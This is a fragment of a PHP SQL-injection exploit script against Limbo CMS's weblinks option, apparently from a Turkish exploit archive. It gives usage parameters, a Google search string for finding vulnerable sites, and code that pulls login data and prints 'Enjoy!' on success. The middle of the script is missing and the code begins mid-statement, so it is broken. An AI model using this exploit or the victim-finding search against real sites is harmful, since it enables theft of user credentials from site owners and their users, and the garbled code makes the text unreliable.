[i] Limbo CMS (option=weblinks) sql injection exploit
[i] Cyber-Security.ORG | Security Advisory | Security Edithor by SnoB | Turkish hacking | security{!}
[*] Usage: ?host=[hostname]&path=[limbo_path]&id=[user_id]
[*] Exemple: ?host=127.0.0.1&path=/limbo&id=1
[g] Google: inurl:"index2.php?option=rss" OR "powered By Limbo CMS"
/",$f)) && (preg_match("/login/",$f)) )
{
echo "$f";
echo "[+] Enjoy! :>
";
$success = 1;
}
}
fclose($fp);
if (!$success)
echo "
[-] exploit failed :<
";
}
?>